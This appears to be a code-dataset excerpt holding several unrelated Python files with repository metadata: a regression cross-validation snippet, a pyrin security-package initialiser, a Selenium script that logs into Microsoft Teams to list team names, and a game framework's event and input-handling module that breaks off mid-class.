names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO','B', 'LSTAT', 'MEDV']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:,0:13]
Y = array[:,13]
kfold = KFold(n_splits=10, random_state=7)
model = LinearRegression()
scoring = 'neg_mean_squared_error'
results = cross_val_score(model, X, Y, cv=kfold, scoring=scoring)
print("Mean Squared Error Linear Regression: %f " % (results.mean())) | 38.1 | 113 | 0.704724 |
9790eecd9b84a3146c5067028bd5cff041711070 | 1,413 | py | Python | src/pyrin/security/__init__.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/security/__init__.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/security/__init__.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
security package.
"""
import pyrin.application.services as application_services
from pyrin.packaging.base import Package
class SecurityPackage(Package):
"""
security package class.
"""
NAME = __name__
COMPONENT_NAME = 'security.component'
CONFIG_STORE_NAMES = ['security']
DEPENDS = ['pyrin.configuration',
'pyrin.cli']
def _load_configs(self, config_services):
"""
loads all required configs of this package.
this method is intended for overriding by
subclasses to do custom configurations.
:param Module config_services: configuration services dependency.
to be able to overcome circular dependency problem,
we should inject configuration services dependency
into this method. because all other packages are
referenced `packaging.base` module in them, so we
can't import `pyrin.configuration.services` in this
module. this is more beautiful in comparison to
importing it inside this method.
"""
flat_configs = config_services.get_all('security')
application_services.configure(flat_configs)
| 35.325 | 90 | 0.577495 |
7327e9469b555c05baba7059e277643180491c33 | 2,361 | py | Python | meetbot/one.py | satyamx/meetbot | 90f1ace6be5135a9789e194484b69eaad3389f18 | [
"MIT"
] | 24 | 2021-01-20T20:49:15.000Z | 2022-03-27T16:44:51.000Z | meetbot/one.py | satyamx/meetbot | 90f1ace6be5135a9789e194484b69eaad3389f18 | [
"MIT"
] | 3 | 2022-01-27T03:53:08.000Z | 2022-01-27T23:15:34.000Z | meetbot/one.py | satyamx/meetbot | 90f1ace6be5135a9789e194484b69eaad3389f18 | [
"MIT"
] | 1 | 2022-01-27T09:06:21.000Z | 2022-01-27T09:06:21.000Z | from selenium import webdriver
import os
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import ElementClickInterceptedException
from selenium.webdriver.common.action_chains import ActionChains
import time
def chrome_options():
global options
options = webdriver.ChromeOptions()
options.add_argument("--no-sandbox")
options.add_argument("--headless")
options.add_argument("--disable-dev-shm-usage")
options.add_argument("--use-fake-ui-for-media-stream")
def bunk(email, password):
global teams
chrome_options()
PATH = '/usr/bin/chromedriver'
driver = webdriver.Chrome(executable_path=PATH, options=options)
driver.get("https://teams.microsoft.com/_#/school//?ctx=teamsGrid")
ignored_exceptions = (NoSuchElementException, StaleElementReferenceException, ElementClickInterceptedException)
email_element = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_element_located((By.ID, "i0116"))
)
email_element.send_keys(email)
email_element.send_keys(Keys.RETURN)
time.sleep(3)
password_element = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_element_located((By.ID, "i0118"))
)
password_element.send_keys(password)
time.sleep(3)
element = WebDriverWait(driver, 100, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_element_located((By.ID, "idSIButton9"))
)
element.click()
time.sleep(3)
actions = ActionChains(driver)
actions.send_keys(Keys.RETURN)
actions.perform()
time.sleep(7)
try:
t4sne = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_all_elements_located((By.CLASS_NAME, "team-name-text"))
)
teams = []
for i in t4sne:
teams.append(i.text)
driver.quit()
return teams
except TimeoutException:
message = 'Invalid credentials'
return message
| 35.772727 | 115 | 0.740364 |
5711e836cfe7b222b19312234efd389e9332d208 | 42,800 | py | Python | pytgf/logic/event.py | Youlixx/pytgf | ea0b5e45afb6da3368ef8e9f340dab26202caddb | [
"MIT"
] | 2 | 2020-07-07T00:23:29.000Z | 2021-03-16T18:42:04.000Z | pytgf/logic/event.py | Youlixx/pytgf | ea0b5e45afb6da3368ef8e9f340dab26202caddb | [
"MIT"
] | null | null | null | pytgf/logic/event.py | Youlixx/pytgf | ea0b5e45afb6da3368ef8e9f340dab26202caddb | [
"MIT"
] | null | null | null | """
Contains every class related to events and some basic key handlers
"""
import numpy
import json
class Event:
"""
The top level event type.
Any event that occurs in the game can be represented using an Event. It can represents the entity interactions with
the level, or the user external inputs. Custom events can be defined by extending this class. The events are handled
by the main event queue.
Attributes
----------
tick: int
The tick at which the event got fired.
"""
def __init__(self, tick: int):
"""
Initializes the Event.
Parameters
----------
tick: int
The tick at which the event got fired.
"""
self.tick = tick
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "Event[tick=" + str(self.tick) + "]"
class CancelableEvent(Event):
"""
A type of event that can be canceled.
Some events may be canceled during their processing by the event queue. When an CancelableEvent is canceled, it will
not be processed further by the next handlers of the event queue.
Attributes
----------
tick: int
The tick at which the event got fired.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int):
"""
Initializes the CancelableEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
"""
Event.__init__(self, tick)
self._canceled = False
def cancel(self) -> None:
"""
Cancels the event.
By canceling the event, it will not be processed by the other handlers of the EventQueue.
"""
self._canceled = True
def is_canceled(self) -> bool:
"""
Returns whether or not the event got canceled.
Returns
-------
canceled: bool
The state of the event, True if it got canceled and False otherwise.
"""
return self._canceled
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "CancelableEvent[tick=" + str(self.tick) + ", canceled=" + str(self._canceled) + "]"
class EventQueue:
"""
The event processing core.
When an event is created, it should be processed by the event queue. The event queue contains the list of different
user-defined handlers in which the new Event will be passed as argument.
Attributes
---------
history: list of Event
The list of fired events.
Methods
-------
register_event_handler(event_type, handler)
Registers a new event handler.
fire_event(event)
Handles a new fired Event.
"""
DEFAULT_HISTORY_LENGTH = 512
def __init__(self, history_length: int = DEFAULT_HISTORY_LENGTH):
"""
Initializes the EventQueue.
Parameters
----------
history_length: int, optional
The length of the event history.
"""
self._history_length = history_length
self._handlers = []
self.history = []
def __len__(self) -> int:
"""
Returns the length of the event history.
Returns
-------
length: int
The length of the event history.
"""
return len(self.history)
def register_event_handler(self, event_type: type, handler: callable) -> None:
"""
Registers a new event handler.
Registers a new handler for the specified event type. Every event that extends from the specified type will be
passed as argument to the handler when fired. The handler functions should only take one argument, the event
fired.
Parameters
----------
event_type: type
The type of event which will be passed to the handler when fired.
handler: callable
The handler function. This function should only take the event passed as argument.
"""
self._handlers.append((event_type, handler))
def fire_event(self, event: Event) -> None:
"""
Handles a new fired event.
Passes the Event through the different registered handlers for the event type. The orders of registration of the
handler is taken into account, using a CancelableEvent allow to break out of the handler loop.
Parameters
----------
event: Event
The fired event.
"""
if len(self.history) == self._history_length:
del self.history[0]
self.history.append(event)
for event_type, handler in self._handlers:
if isinstance(event, event_type):
if isinstance(event, CancelableEvent):
if not event.is_canceled():
handler(event)
else:
handler(event)
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "EventQueue[]"
class Key:
"""
An enumeration containing the different key codes.
The user keyboard inputs are represented using key codes. The Key class stores the key codes of every possible input
that can be issued by the Window.
Methods
-------
get_corresponding_char(key_code)
Converts the key code into the associated character.
"""
KEY_BACKSPACE = 65288
KEY_TAB = 65289
KEY_LINEFEED = 65290
KEY_CLEAR = 65291
KEY_RETURN = 65293
KEY_ENTER = 65293
KEY_PAUSE = 65299
KEY_SCROLL_LOCK = 65300
KEY_SYS_REQ = 65301
KEY_ESCAPE = 65307
KEY_HOME = 65360
KEY_LEFT = 65361
KEY_UP = 65362
KEY_RIGHT = 65363
KEY_DOWN = 65364
KEY_PAGE_UP = 65365
KEY_PAGE_DOWN = 65366
KEY_END = 65367
KEY_BEGIN = 65368
KEY_DELETE = 65535
KEY_SELECT = 65376
KEY_PRINT = 65377
KEY_EXECUTE = 65378
KEY_INSERT = 65379
KEY_UNDO = 65381
KEY_REDO = 65382
KEY_MENU = 65383
KEY_FIND = 65384
KEY_CANCEL = 65385
KEY_HELP = 65386
KEY_BREAK = 65387
KEY_MODE_SWITCH = 65406
KEY_SCRIPT_SWITCH = 65406
KEY_MOTION_UP = 65362
KEY_MOTION_RIGHT = 65363
KEY_MOTION_DOWN = 65364
KEY_MOTION_LEFT = 65361
KEY_MOTION_NEXT_WORD = 1
KEY_MOTION_PREVIOUS_WORD = 2
KEY_MOTION_BEGINNING_OF_LINE = 3
KEY_MOTION_END_OF_LINE = 4
KEY_MOTION_NEXT_PAGE = 65366
KEY_MOTION_PREVIOUS_PAGE = 65365
KEY_MOTION_BEGINNING_OF_FILE = 5
KEY_MOTION_END_OF_FILE = 6
KEY_MOTION_BACKSPACE = 65288
KEY_MOTION_DELETE = 65535
KEY_NUM_LOCK = 65407
KEY_NUM_SPACE = 65408
KEY_NUM_TAB = 65417
KEY_NUM_ENTER = 65421
KEY_NUM_F1 = 65425
KEY_NUM_F2 = 65426
KEY_NUM_F3 = 65427
KEY_NUM_F4 = 65428
KEY_NUM_HOME = 65429
KEY_NUM_LEFT = 65430
KEY_NUM_UP = 65431
KEY_NUM_RIGHT = 65432
KEY_NUM_DOWN = 65433
KEY_NUM_PRIOR = 65434
KEY_NUM_PAGE_UP = 65434
KEY_NUM_NEXT = 65435
KEY_NUM_PAGE_DOWN = 65435
KEY_NUM_END = 65436
KEY_NUM_BEGIN = 65437
KEY_NUM_INSERT = 65438
KEY_NUM_DELETE = 65439
KEY_NUM_EQUAL = 65469
KEY_NUM_MULTIPLY = 65450
KEY_NUM_ADD = 65451
KEY_NUM_SEPARATOR = 65452
KEY_NUM_SUBTRACT = 65453
KEY_NUM_DECIMAL = 65454
KEY_NUM_DIVIDE = 65455
KEY_NUM_0 = 65456
KEY_NUM_1 = 65457
KEY_NUM_2 = 65458
KEY_NUM_3 = 65459
KEY_NUM_4 = 65460
KEY_NUM_5 = 65461
KEY_NUM_6 = 65462
KEY_NUM_7 = 65463
KEY_NUM_8 = 65464
KEY_NUM_9 = 65465
KEY_F1 = 65470
KEY_F2 = 65471
KEY_F3 = 65472
KEY_F4 = 65473
KEY_F5 = 65474
KEY_F6 = 65475
KEY_F7 = 65476
KEY_F8 = 65477
KEY_F9 = 65478
KEY_F10 = 65479
KEY_F11 = 65480
KEY_F12 = 65481
KEY_F13 = 65482
KEY_F14 = 65483
KEY_F15 = 65484
KEY_F16 = 65485
KEY_LEFT_SHIFT = 65505
KEY_RIGHT_SHIFT = 65506
KEY_LEFT_CTRL = 65507
KEY_RIGHT_CTRL = 65508
KEY_CAPS_LOCK = 65509
KEY_LEFT_META = 65511
KEY_RIGHT_META = 65512
KEY_LEFT_ALT = 65513
KEY_RIGHT_ALT = 65514
KEY_LEFT_WINDOWS = 65515
KEY_RIGHT_WINDOWS = 65516
KEY_LEFT_COMMAND = 65517
KEY_RIGHT_COMMAND = 65518
KEY_LEFT_OPTION = 65488
KEY_RIGHT_OPTION = 65489
KEY_SPACE = 32
KEY_EXCLAMATION = 33
KEY_DOUBLE_QUOTE = 34
KEY_HASH = 35
KEY_POUND = 35
KEY_DOLLAR = 36
KEY_PERCENT = 37
KEY_AMPERSAND = 38
KEY_APOSTROPHE = 39
KEY_LEFT_PARENTHESIS = 40
KEY_RIGHT_PARENTHESIS = 41
KEY_ASTERISK = 42
KEY_PLUS = 43
KEY_COMMA = 44
KEY_MINUS = 45
KEY_PERIOD = 46
KEY_SLASH = 47
KEY_COLON = 58
KEY_SEMICOLON = 59
KEY_LESS = 60
KEY_EQUAL = 61
KEY_GREATER = 62
KEY_QUESTION = 63
KEY_AT = 64
KEY_LEFT_BRACKET = 91
KEY_BACKSLASH = 92
KEY_RIGHT_BRACKET = 93
KEY_ASCII_CIRCUMFLEX = 94
KEY_UNDERSCORE = 95
KEY_GRAVE = 96
KEY_QUOTE_LEFT = 96
KEY_A = 97
KEY_B = 98
KEY_C = 99
KEY_D = 100
KEY_E = 101
KEY_F = 102
KEY_G = 103
KEY_H = 104
KEY_I = 105
KEY_J = 106
KEY_K = 107
KEY_L = 108
KEY_M = 109
KEY_N = 110
KEY_O = 111
KEY_P = 112
KEY_Q = 113
KEY_R = 114
KEY_S = 115
KEY_T = 116
KEY_U = 117
KEY_V = 118
KEY_W = 119
KEY_X = 120
KEY_Y = 121
KEY_Z = 122
KEY_LEFT_BRACE = 123
KEY_BAR = 124
KEY_RIGHT_BRACE = 125
KEY_ASCII_TILDE = 126
TABLE = {
KEY_SPACE: " ",
KEY_NUM_0: "0", KEY_NUM_1: "1", KEY_NUM_2: "2", KEY_NUM_3: "3", KEY_NUM_4: "4",
KEY_NUM_5: "5", KEY_NUM_6: "6", KEY_NUM_7: "7", KEY_NUM_8: "8", KEY_NUM_9: "9",
KEY_A: "a", KEY_B: "b", KEY_C: "c", KEY_D: "d", KEY_E: "e", KEY_F: "f", KEY_G: "g", KEY_H: "h", KEY_I: "i",
KEY_J: "j", KEY_K: "k", KEY_L: "l", KEY_M: "m", KEY_N: "n", KEY_O: "o", KEY_P: "p", KEY_Q: "q", KEY_R: "r",
KEY_S: "s", KEY_T: "t", KEY_U: "u", KEY_V: "v", KEY_W: "w", KEY_X: "x", KEY_Y: "y", KEY_Z: "z"
}
@staticmethod
def get_corresponding_char(key_code: int) -> str:
"""
Converts the key code into the associated character.
Looks up the key code in the class table and finds the corresponding character. If the key code is unknown, it
returns an empty string.
Parameters
----------
key_code
The code of the key.
Returns
-------
character: str
The character corresponding to the key code.
"""
if key_code in Key.TABLE:
return Key.TABLE[key_code]
return ""
class MouseButton:
"""
An enumeration containing the different mouse button codes.
The user mouse button inputs are represented using button codes. The MouseButton class stores the key codes of every
possible input that can be issued by the Window.
"""
MOUSE_BUTTON_LEFT = 1
MOUSE_BUTTON_RIGHT = 4
MOUSE_BUTTON_MIDDLE = 2
class InputEvent(CancelableEvent):
"""
A generic type of event used for user input.
This type of event is used for any event related to a user input. Theses event extend from CancelableEvent, hence
they can be canceled while being processed by the event queue. This can be useful if more than one object interact
with the keyboard at once, by giving priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputEvent[tick=" + str(self.tick) + ", canceled=" + str(self._canceled) + "]"
class KeyEvent(InputEvent):
"""
A generic type of event used for key input.
This type of event is used for any event related to the update of a key input. Theses event extend from
CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more
than one object interact with the keyboard at once, by giving priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key updated (see also Key).
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, key: int):
"""
Initializes the KeyEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key updated (see also Key).
"""
CancelableEvent.__init__(self, tick)
self.key = key
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", canceled=" + str(self._canceled) + "]"
class KeyPressedEvent(KeyEvent):
"""
The type of KeyEvent used for key press event.
This kind of event is fired whenever an key is being pressed. Unlike the KeyHeldEvent, this event is only issued
once before the key got released.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key pressed.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyPressedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"canceled=" + str(self._canceled) + "]"
class KeyReleasedEvent(KeyEvent):
"""
The type of KeyEvent used for key release event.
This kind of event is fired whenever an key is being released. This event can only be fired after a KeyPressedEvent
is issued.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key released.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyReleasedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"canceled=" + str(self._canceled) + "]"
class KeyTypedEvent(KeyEvent):
"""
The type of KeyEvent used for key type event.
This kind of event is fired whenever an key is being typed. This event will be fired when the Key is released only
if it had been held for a short period of time (see InputHandler to specify the delay).
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key typed.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyTypedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"canceled=" + str(self._canceled) + "]"
class KeyHeldEvent(KeyEvent):
"""
The type of KeyEvent used for key hold event.
This kind of event is fired whenever an key is being held. This event will be repeated each tick while the key is
being held. It is always preceded by a KeyPressedEvent and followed by KeyReleasedEvent of the same key.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key held.
duration: int
The number of tick for which the key has been held for.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, key: int, duration: int):
"""
Initializes the KeyHeldEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key held.
duration: int
The number of tick for which the key has been held for.
"""
KeyEvent.__init__(self, tick, key)
self.duration = duration
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyHeldEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"duration=" + str(self.duration) + ", canceled=" + str(self._canceled) + "]"
class MouseEvent(InputEvent):
"""
A generic type of event used for mouse input.
This type of event is used for any event related to the update of the mouse state (either a mouse button or the
position of the pointer). Theses events extends from CancelableEvent, hence they can be canceled while being
processed by the event queue. This can be useful if more than one object interact with the mouse at once, by giving
priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, position: numpy.ndarray):
"""
Initializes the MouseEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The position of the pointer on the screen.
"""
CancelableEvent.__init__(self, tick)
self.position = position
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseEvent[tick=" + str(self.tick) + ", position=" + str(self.position) + ", " + \
"canceled=" + str(self._canceled) + "]"
class MouseMovedEvent(MouseEvent):
"""
The type of MouseEvent used for mouse move event.
This kind of event is fired whenever the mouse is being moved.
Attributes
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseMovedEvent[tick=" + str(self.tick) + ", position=" + str(self.position) + ", " + \
"canceled=" + str(self._canceled) + "]"
class MouseButtonEvent(MouseEvent):
"""
A generic type of event used for mouse button input.
This type of event is used for any event related to the update of a mouse button state. Theses events extends from
CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more
than one object interact with the mouse at once, by giving priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button updated (see also MouseButton).
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, button: int, position: numpy.ndarray):
"""
Initializes the MouseButtonEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button updated.
position: numpy.ndarray
The position of the pointer on the screen.
"""
MouseEvent.__init__(self, tick, position)
self.button = button
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseButtonPressedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse button press event.
This kind of event is fired whenever a mouse button is being pressed. Unlike the MouseDraggedEvent, this event is
only issued once before the key got released.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button pressed.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonPressedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseButtonReleasedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse button release event.
This kind of event is fired whenever a mouse button is being released. This event can only be fired after a
MouseButtonPressedEvent is issued.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button released.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonReleasedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseButtonClickedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse button click event.
This kind of event is fired whenever a mouse button is being clicked. This event will be fired when the mouse button
is released only if it had been held for a short period of time (see InputHandler to specify the delay).
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button clicked.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonClickedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseDraggedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse drag event.
This kind of event is fired whenever a mouse button is being dragged (in other words, when the mouse is being moved
while a mouse button is held). This event will be repeated each tick while the mouse button is being held. It is
always preceded by a MouseButtonPressedEvent and followed by MouseButtonReleasedEvent of the same mouse button.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button held.
position: numpy.ndarray
The position of the pointer on the screen.
duration: int
The number of tick for which the mouse button has been held for.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, button: int, position: numpy.ndarray, duration: int):
"""
Initializes the MouseDraggedEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button held.
position: numpy.ndarray
The position of the pointer on the screen.
duration: int
The number of tick for which the mouse button has been held for.
"""
MouseButtonEvent.__init__(self, tick, button, position)
self.duration = duration
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonDraggedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"duration=" + str(self.duration) + ", position=" + str(self.position) + ", " + \
"canceled=" + str(self._canceled) + "]"
class InputHandler:
"""
The source of any user input.
Any game with user interaction should use an InputHandler.
Attributes
----------
mouse_position: numpy.ndarray
The current position of the mouse pointer on the screen.
Methods
-------
fire_events(tick)
Fires the key and mouse events.
record()
Starts the input recording.
export_record(path)
Exports the record into a replay file.
load_replay(path)
Loads a replay and plays it.
key_press(key_code)
Sets the state of the specified key as pressed.
key_release(key_code)
Sets the state of the specified key as released.
mouse_button_press(mouse_button)
Sets the state of the specified key as pressed.
mouse_button_release(mouse_button)
Sets the state of the specified mouse button as released.
move_mouse(position)
Sets the position of the mouse pointer.
"""
DEFAULT_DURATION_TYPE = 20
DEFAULT_DURATION_CLICK = 20
def __init__(self, event_queue: EventQueue, duration_type: int = DEFAULT_DURATION_TYPE,
duration_click: int = DEFAULT_DURATION_CLICK):
"""
Initializes the InputHandler.
Parameters
----------
event_queue: EventQueue
The main event queue used to handle the events.
duration_type: int, optional
The threshold expressed in tick before which a key hold is considered as a type.
duration_click: int, optional
the threshold expressed in tick before which a mouse button hold is considered a click.
"""
self._event_queue = event_queue
self._duration_type = duration_type
self._duration_click = duration_click
self._key_durations = {}
self._mouse_button_durations = {}
self.mouse_position = numpy.array((0, 0), dtype=int)
self._mouse_previous_position = numpy.array((0, 0), dtype=int)
self._recorder = None
self._replay = None
self._should_record = False
def key_press(self, key_code: int) -> None:
"""
Sets the state of the specified key as pressed.
Makes the InputHandler consider the specified key as pressed until another function to release the key is
called.
Parameters
----------
key_code: int
The code of the key pressed.
"""
if key_code not in self._key_durations:
self._key_durations[key_code] = [0, False]
def key_release(self, key_code: int) -> None:
"""
Sets the state of the specified key as released.
Makes the InputHandler consider the specified key as released until another function to press the key is called.
Parameters
----------
key_code: int
The code of the key released.
"""
if key_code in self._key_durations:
self._key_durations[key_code][1] = True
def mouse_button_press(self, mouse_button: int) -> None:
"""
Sets the state of the specified mouse button as pressed.
Makes the InputHandler consider the specified mouse button as pressed until another function to release the
button is called.
Parameters
----------
mouse_button: int
The code of the mouse button pressed.
"""
if mouse_button not in self._mouse_button_durations:
self._mouse_button_durations[mouse_button] = [0, False]
def mouse_button_release(self, mouse_button: int) -> None:
"""
Sets the state of the specified mouse button as released.
Makes the InputHandler consider the specified mouse button as released until another function to press the
button is called.
Parameters
----------
mouse_button: int
The code of the mouse button released.
"""
if mouse_button in self._mouse_button_durations:
self._mouse_button_durations[mouse_button][1] = True
def move_mouse(self, position: numpy.ndarray) -> None:
"""
Sets the position of the mouse pointer.
Parameters
----------
position: numpy.ndarray
The current position of the mouse pointer on the screen.
"""
self.mouse_position = position
def record(self) -> None:
"""
Starts the input recording.
"""
self._should_record = True
def export_record(self, path) -> None:
"""
Exports the record into a replay file.
Parameters
----------
path: str
The path to the replay file.
"""
with open(path, "w") as file:
json.dump(self._recorder.inputs, file)
def load_replay(self, path, replay_tick: int = 0) -> None:
"""
Loads a replay and plays it.
Parameters
----------
path: str
The path to the replay file.
replay_tick: int
The local tick reference of the replay.
"""
with open(path, "r") as file:
inputs = json.load(file)
self._replay = InputReplay(inputs, replay_tick=replay_tick)
def fire_events(self, tick: int) -> None:
"""
Fires the key and mouse events.
This function creates every event related to key and mouse inputs and queues them in the main event queue. It
should be called at every tick, each time the logic is done.
Parameters
----------
tick: int
The current logic tick.
"""
if self._replay is not None:
self._replay.play(tick, self)
if self._should_record:
self._recorder = InputRecorder(tick)
self._should_record = False
for key in list(self._key_durations.keys()):
if self._key_durations[key][1]:
self._event_queue.fire_event(KeyReleasedEvent(tick, key))
if self._recorder is not None:
self._recorder.key_release(tick, key)
if self._key_durations[key][0] <= self._duration_type:
self._event_queue.fire_event(KeyTypedEvent(tick, key))
del self._key_durations[key]
else:
if self._key_durations[key][0] == 0:
self._event_queue.fire_event(KeyPressedEvent(tick, key))
if self._recorder is not None:
self._recorder.key_press(tick, key)
else:
self._event_queue.fire_event(KeyHeldEvent(tick, key, self._key_durations[key][0]))
self._key_durations[key][0] += 1
for mouse_button in list(self._mouse_button_durations.keys()):
if self._mouse_button_durations[mouse_button][1]:
self._event_queue.fire_event(MouseButtonReleasedEvent(tick, mouse_button, self.mouse_position))
if self._recorder is not None:
self._recorder.mouse_button_release(tick, mouse_button)
if self._mouse_button_durations[mouse_button][0] < self._duration_click:
self._event_queue.fire_event(MouseButtonClickedEvent(tick, mouse_button, self.mouse_position))
del self._mouse_button_durations[mouse_button]
else:
if self._mouse_button_durations[mouse_button][0] == 0:
self._event_queue.fire_event(MouseButtonPressedEvent(tick, mouse_button, self.mouse_position))
if self._recorder is not None:
self._recorder.mouse_button_press(tick, mouse_button)
elif not numpy.array_equal(self.mouse_position, self._mouse_previous_position):
self._event_queue.fire_event(MouseDraggedEvent(
tick, mouse_button, self.mouse_position, self._mouse_button_durations[mouse_button][0]
))
self._mouse_button_durations[mouse_button][0] += 1
if not numpy.array_equal(self.mouse_position, self._mouse_previous_position):
self._event_queue.fire_event(MouseMovedEvent(tick, self.mouse_position))
if self._recorder is not None:
self._recorder.move_mouse(tick, self.mouse_position)
self._mouse_previous_position = self.mouse_position
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputHandler[mouse_position=" + str(self.mouse_position) + "]"
class InputReplay:
"""
A simple way of queueing a sequence of inputs.
Methods
-------
play(tick, input_handler)
Plays the actions of the replay of the specified tick.
"""
EVENT_KEY_PRESS = 0
EVENT_KEY_RELEASE = 1
EVENT_MOUSE_BUTTON_PRESS = 2
EVENT_MOUSE_BUTTON_RELEASE = 3
